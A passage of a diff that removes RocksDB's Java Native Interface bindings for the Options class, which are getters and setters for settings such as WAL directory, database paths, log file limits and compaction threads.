-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  std::shared_ptr<rocksdb::Statistics> sptr = opt->statistics;
-  if (sptr == nullptr) {
-    return 0;
-  } else {
-    std::shared_ptr<rocksdb::Statistics>* pSptr =
-        new std::shared_ptr<rocksdb::Statistics>(sptr);
-    return reinterpret_cast<jlong>(pSptr);
-  }
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    maxWriteBufferNumber
- * Signature: (J)I
- */
-jint Java_org_rocksdb_Options_maxWriteBufferNumber(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->max_write_buffer_number;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    errorIfExists
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_errorIfExists(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->error_if_exists;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setErrorIfExists
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setErrorIfExists(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean error_if_exists) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->error_if_exists =
-      static_cast<bool>(error_if_exists);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    paranoidChecks
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_paranoidChecks(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->paranoid_checks;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setParanoidChecks
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setParanoidChecks(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean paranoid_checks) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->paranoid_checks =
-      static_cast<bool>(paranoid_checks);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setEnv
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setEnv(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jenv) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->env =
-      reinterpret_cast<rocksdb::Env*>(jenv);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMaxTotalWalSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setMaxTotalWalSize(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jmax_total_wal_size) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->max_total_wal_size =
-      static_cast<jlong>(jmax_total_wal_size);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    maxTotalWalSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_maxTotalWalSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->
-      max_total_wal_size;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    maxOpenFiles
- * Signature: (J)I
- */
-jint Java_org_rocksdb_Options_maxOpenFiles(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->max_open_files;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMaxOpenFiles
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setMaxOpenFiles(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint max_open_files) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->max_open_files =
-      static_cast<int>(max_open_files);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMaxFileOpeningThreads
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setMaxFileOpeningThreads(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint jmax_file_opening_threads) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->max_file_opening_threads =
-      static_cast<int>(jmax_file_opening_threads);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    maxFileOpeningThreads
- * Signature: (J)I
- */
-jint Java_org_rocksdb_Options_maxFileOpeningThreads(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return static_cast<int>(opt->max_file_opening_threads);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    useFsync
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_useFsync(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->use_fsync;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setUseFsync
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setUseFsync(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean use_fsync) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->use_fsync =
-      static_cast<bool>(use_fsync);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setDbPaths
- * Signature: (J[Ljava/lang/String;[J)V
- */
-void Java_org_rocksdb_Options_setDbPaths(
-    JNIEnv* env, jobject jobj, jlong jhandle, jobjectArray jpaths,
-    jlongArray jtarget_sizes) {
-  std::vector<rocksdb::DbPath> db_paths;
-  jlong* ptr_jtarget_size = env->GetLongArrayElements(jtarget_sizes, nullptr);
-  if(ptr_jtarget_size == nullptr) {
-      // exception thrown: OutOfMemoryError
-      return;
-  }
-
-  jboolean has_exception = JNI_FALSE;
-  const jsize len = env->GetArrayLength(jpaths);
-  for(jsize i = 0; i < len; i++) {
-    jobject jpath = reinterpret_cast<jstring>(env->
-        GetObjectArrayElement(jpaths, i));
-    if(env->ExceptionCheck()) {
-      // exception thrown: ArrayIndexOutOfBoundsException
-      env->ReleaseLongArrayElements(
-          jtarget_sizes, ptr_jtarget_size, JNI_ABORT);
-      return;
-    }
-    std::string path = rocksdb::JniUtil::copyString(
-        env, static_cast<jstring>(jpath), &has_exception);
-    env->DeleteLocalRef(jpath);
-
-    if(has_exception == JNI_TRUE) {
-        env->ReleaseLongArrayElements(
-            jtarget_sizes, ptr_jtarget_size, JNI_ABORT);
-        return;
-    }
-
-    jlong jtarget_size = ptr_jtarget_size[i];
-
-    db_paths.push_back(
-        rocksdb::DbPath(path, static_cast<uint64_t>(jtarget_size)));
-  }
-
-  env->ReleaseLongArrayElements(jtarget_sizes, ptr_jtarget_size, JNI_ABORT);
-
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opt->db_paths = db_paths;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    dbPathsLen
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_dbPathsLen(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return static_cast<jlong>(opt->db_paths.size());
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    dbPaths
- * Signature: (J[Ljava/lang/String;[J)V
- */
-void Java_org_rocksdb_Options_dbPaths(
-    JNIEnv* env, jobject jobj, jlong jhandle, jobjectArray jpaths,
-    jlongArray jtarget_sizes) {
-  jlong* ptr_jtarget_size = env->GetLongArrayElements(jtarget_sizes, nullptr);
-  if(ptr_jtarget_size == nullptr) {
-      // exception thrown: OutOfMemoryError
-      return;
-  }
-
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  const jsize len = env->GetArrayLength(jpaths);
-  for(jsize i = 0; i < len; i++) {
-    rocksdb::DbPath db_path = opt->db_paths[i];
-
-    jstring jpath = env->NewStringUTF(db_path.path.c_str());
-    if(jpath == nullptr) {
-      // exception thrown: OutOfMemoryError
-      env->ReleaseLongArrayElements(
-          jtarget_sizes, ptr_jtarget_size, JNI_ABORT);
-      return;
-    }
-    env->SetObjectArrayElement(jpaths, i, jpath);
-    if(env->ExceptionCheck()) {
-      // exception thrown: ArrayIndexOutOfBoundsException
-      env->DeleteLocalRef(jpath);
-      env->ReleaseLongArrayElements(
-          jtarget_sizes, ptr_jtarget_size, JNI_ABORT);
-      return;
-    }
-
-    ptr_jtarget_size[i] = static_cast<jint>(db_path.target_size);
-  }
-
-  env->ReleaseLongArrayElements(jtarget_sizes, ptr_jtarget_size, JNI_COMMIT);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    dbLogDir
- * Signature: (J)Ljava/lang/String
- */
-jstring Java_org_rocksdb_Options_dbLogDir(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return env->NewStringUTF(
-      reinterpret_cast<rocksdb::Options*>(jhandle)->db_log_dir.c_str());
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setDbLogDir
- * Signature: (JLjava/lang/String)V
- */
-void Java_org_rocksdb_Options_setDbLogDir(
-    JNIEnv* env, jobject jobj, jlong jhandle, jstring jdb_log_dir) {
-  const char* log_dir = env->GetStringUTFChars(jdb_log_dir, nullptr);
-  if(log_dir == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-  reinterpret_cast<rocksdb::Options*>(jhandle)->db_log_dir.assign(log_dir);
-  env->ReleaseStringUTFChars(jdb_log_dir, log_dir);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    walDir
- * Signature: (J)Ljava/lang/String
- */
-jstring Java_org_rocksdb_Options_walDir(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return env->NewStringUTF(
-      reinterpret_cast<rocksdb::Options*>(jhandle)->wal_dir.c_str());
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setWalDir
- * Signature: (JLjava/lang/String)V
- */
-void Java_org_rocksdb_Options_setWalDir(
-    JNIEnv* env, jobject jobj, jlong jhandle, jstring jwal_dir) {
-  const char* wal_dir = env->GetStringUTFChars(jwal_dir, nullptr);
-  if(wal_dir == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-  reinterpret_cast<rocksdb::Options*>(jhandle)->wal_dir.assign(wal_dir);
-  env->ReleaseStringUTFChars(jwal_dir, wal_dir);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    deleteObsoleteFilesPeriodMicros
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_deleteObsoleteFilesPeriodMicros(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)
-      ->delete_obsolete_files_period_micros;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setDeleteObsoleteFilesPeriodMicros
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setDeleteObsoleteFilesPeriodMicros(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong micros) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)
-      ->delete_obsolete_files_period_micros =
-          static_cast<int64_t>(micros);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setBaseBackgroundCompactions
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setBaseBackgroundCompactions(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint max) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)
-      ->base_background_compactions = static_cast<int>(max);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    baseBackgroundCompactions
- * Signature: (J)I
- */
-jint Java_org_rocksdb_Options_baseBackgroundCompactions(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)
-      ->base_background_compactions;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    maxBackgroundCompactions
- * Signature: (J)I
- */
-jint Java_org_rocksdb_Options_maxBackgroundCompactions(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-      jhandle)->max_background_compactions;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMaxBackgroundCompactions
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setMaxBackgroundCompactions(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint max) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)
-      ->max_background_compactions = static_cast<int>(max);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMaxSubcompactions
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setMaxSubcompactions(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint max) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)
-      ->max_subcompactions = static_cast<int32_t>(max);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    maxSubcompactions
- * Signature: (J)I
- */
-jint Java_org_rocksdb_Options_maxSubcompactions(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->max_subcompactions;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    maxBackgroundFlushes
- * Signature: (J)I
- */
-jint Java_org_rocksdb_Options_maxBackgroundFlushes(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->max_background_flushes;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMaxBackgroundFlushes
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setMaxBackgroundFlushes(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint max_background_flushes) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->max_background_flushes =
-      static_cast<int>(max_background_flushes);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    maxLogFileSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_maxLogFileSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->max_log_file_size;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMaxLogFileSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setMaxLogFileSize(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong max_log_file_size) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(max_log_file_size);
-  if (s.ok()) {
-    reinterpret_cast<rocksdb::Options*>(jhandle)->max_log_file_size =
-        max_log_file_size;
-  } else {
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    logFileTimeToRoll
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_logFileTimeToRoll(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->log_file_time_to_roll;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setLogFileTimeToRoll
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setLogFileTimeToRoll(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong log_file_time_to_roll) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(
-      log_file_time_to_roll);
-  if (s.ok()) {
-    reinterpret_cast<rocksdb::Options*>(jhandle)->log_file_time_to_roll =
-        log_file_time_to_roll;
-  } else {
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    keepLogFileNum
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_keepLogFileNum(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->keep_log_file_num;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setKeepLogFileNum
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setKeepLogFileNum(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong keep_log_file_num) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(keep_log_file_num);
-  if (s.ok()) {
-    reinterpret_cast<rocksdb::Options*>(jhandle)->keep_log_file_num =
-        keep_log_file_num;
-  } else {
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    recycleLogFileNum
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_recycleLogFileNum(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->recycle_log_file_num;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setRecycleLogFileNum
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setRecycleLogFileNum(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong recycle_log_file_num) {
-  rocksdb::Status s =
-      rocksdb::check_if_jlong_fits_size_t(recycle_log_file_num);
-  if (s.ok()) {
-    reinterpret_cast<rocksdb::Options*>(jhandle)->recycle_log_file_num =
-        recycle_log_file_num;
-  } else {
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    maxManifestFileSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_maxManifestFileSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->max_manifest_file_size;
-}
-
-/*
- * Method:    memTableFactoryName
- * Signature: (J)Ljava/lang/String
- */
-jstring Java_org_rocksdb_Options_memTableFactoryName(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  rocksdb::MemTableRepFactory* tf = opt->memtable_factory.get();
-
-  // Should never be nullptr.
-  // Default memtable factory is SkipListFactory
-  assert(tf);
-
-  // temporarly fix for the historical typo
-  if (strcmp(tf->Name(), "HashLinkListRepFactory") == 0) {
-    return env->NewStringUTF("HashLinkedListRepFactory");
-  }
-
-  return env->NewStringUTF(tf->Name());
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMaxManifestFileSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setMaxManifestFileSize(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong max_manifest_file_size) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->max_manifest_file_size =
-      static_cast<int64_t>(max_manifest_file_size);
-}
-
-/*
- * Method:    setMemTableFactory
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setMemTableFactory(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jfactory_handle) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->memtable_factory.reset(
-      reinterpret_cast<rocksdb::MemTableRepFactory*>(jfactory_handle));
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setRateLimiter
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setRateLimiter(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jrate_limiter_handle) {
-  std::shared_ptr<rocksdb::RateLimiter> *pRateLimiter =
-      reinterpret_cast<std::shared_ptr<rocksdb::RateLimiter> *>(
-          jrate_limiter_handle);
-  reinterpret_cast<rocksdb::Options*>(jhandle)->
-      rate_limiter = *pRateLimiter;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setLogger
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setLogger(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jlogger_handle) {
-std::shared_ptr<rocksdb::LoggerJniCallback> *pLogger =
-      reinterpret_cast<std::shared_ptr<rocksdb::LoggerJniCallback> *>(
-          jlogger_handle);
-  reinterpret_cast<rocksdb::Options*>(jhandle)->info_log = *pLogger;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setInfoLogLevel
- * Signature: (JB)V
- */
-void Java_org_rocksdb_Options_setInfoLogLevel(
-    JNIEnv* env, jobject jobj, jlong jhandle, jbyte jlog_level) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->info_log_level =
-      static_cast<rocksdb::InfoLogLevel>(jlog_level);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    infoLogLevel
- * Signature: (J)B
- */
-jbyte Java_org_rocksdb_Options_infoLogLevel(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return static_cast<jbyte>(
-      reinterpret_cast<rocksdb::Options*>(jhandle)->info_log_level);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    tableCacheNumshardbits
- * Signature: (J)I
- */
-jint Java_org_rocksdb_Options_tableCacheNumshardbits(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->table_cache_numshardbits;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setTableCacheNumshardbits
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setTableCacheNumshardbits(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint table_cache_numshardbits) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->table_cache_numshardbits =
-      static_cast<int>(table_cache_numshardbits);
-}
-
-/*
- * Method:    useFixedLengthPrefixExtractor
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_useFixedLengthPrefixExtractor(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint jprefix_length) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->prefix_extractor.reset(
-      rocksdb::NewFixedPrefixTransform(
-          static_cast<int>(jprefix_length)));
-}
-
-/*
- * Method:    useCappedPrefixExtractor
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_useCappedPrefixExtractor(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint jprefix_length) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->prefix_extractor.reset(
-      rocksdb::NewCappedPrefixTransform(
-          static_cast<int>(jprefix_length)));
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    walTtlSeconds
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_walTtlSeconds(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->WAL_ttl_seconds;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setWalTtlSeconds
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setWalTtlSeconds(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong WAL_ttl_seconds) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->WAL_ttl_seconds =
-      static_cast<int64_t>(WAL_ttl_seconds);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    walTtlSeconds
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_walSizeLimitMB(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->WAL_size_limit_MB;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setWalSizeLimitMB
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setWalSizeLimitMB(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong WAL_size_limit_MB) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->WAL_size_limit_MB =
-      static_cast<int64_t>(WAL_size_limit_MB);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    manifestPreallocationSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_manifestPreallocationSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)
-      ->manifest_preallocation_size;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setManifestPreallocationSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setManifestPreallocationSize(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong preallocation_size) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(preallocation_size);
-  if (s.ok()) {
-    reinterpret_cast<rocksdb::Options*>(jhandle)->manifest_preallocation_size =
-        preallocation_size;
-  } else {
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Method:    setTableFactory
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setTableFactory(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jfactory_handle) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->table_factory.reset(
-      reinterpret_cast<rocksdb::TableFactory*>(jfactory_handle));
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    allowMmapReads
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_allowMmapReads(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->allow_mmap_reads;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setAllowMmapReads
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setAllowMmapReads(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean allow_mmap_reads) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->allow_mmap_reads =
-      static_cast<bool>(allow_mmap_reads);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    allowMmapWrites
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_allowMmapWrites(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->allow_mmap_writes;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setAllowMmapWrites
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setAllowMmapWrites(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean allow_mmap_writes) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->allow_mmap_writes =
-      static_cast<bool>(allow_mmap_writes);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    useDirectReads
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_useDirectReads(JNIEnv* env, jobject jobj,
-                                                 jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->use_direct_reads;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setUseDirectReads
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setUseDirectReads(JNIEnv* env, jobject jobj,
-                                                jlong jhandle,
-                                                jboolean use_direct_reads) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->use_direct_reads =
-      static_cast<bool>(use_direct_reads);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    useDirectIoForFlushAndCompaction
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_useDirectIoForFlushAndCompaction(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)
-      ->use_direct_io_for_flush_and_compaction;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setUseDirectIoForFlushAndCompaction
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setUseDirectIoForFlushAndCompaction(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean use_direct_io_for_flush_and_compaction) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)
-      ->use_direct_io_for_flush_and_compaction =
-      static_cast<bool>(use_direct_io_for_flush_and_compaction);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setAllowFAllocate
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setAllowFAllocate(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean jallow_fallocate) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->allow_fallocate =
-      static_cast<bool>(jallow_fallocate);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    allowFAllocate
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_allowFAllocate(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return static_cast<jboolean>(opt->allow_fallocate);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    isFdCloseOnExec
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_isFdCloseOnExec(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->is_fd_close_on_exec;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setIsFdCloseOnExec
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setIsFdCloseOnExec(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean is_fd_close_on_exec) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->is_fd_close_on_exec =
-      static_cast<bool>(is_fd_close_on_exec);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    statsDumpPeriodSec
- * Signature: (J)I
- */
-jint Java_org_rocksdb_Options_statsDumpPeriodSec(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->stats_dump_period_sec;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setStatsDumpPeriodSec
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setStatsDumpPeriodSec(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint stats_dump_period_sec) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->stats_dump_period_sec =
-      static_cast<int>(stats_dump_period_sec);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    adviseRandomOnOpen
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_adviseRandomOnOpen(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->advise_random_on_open;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setAdviseRandomOnOpen
- * Signature: (JZ)V
- */
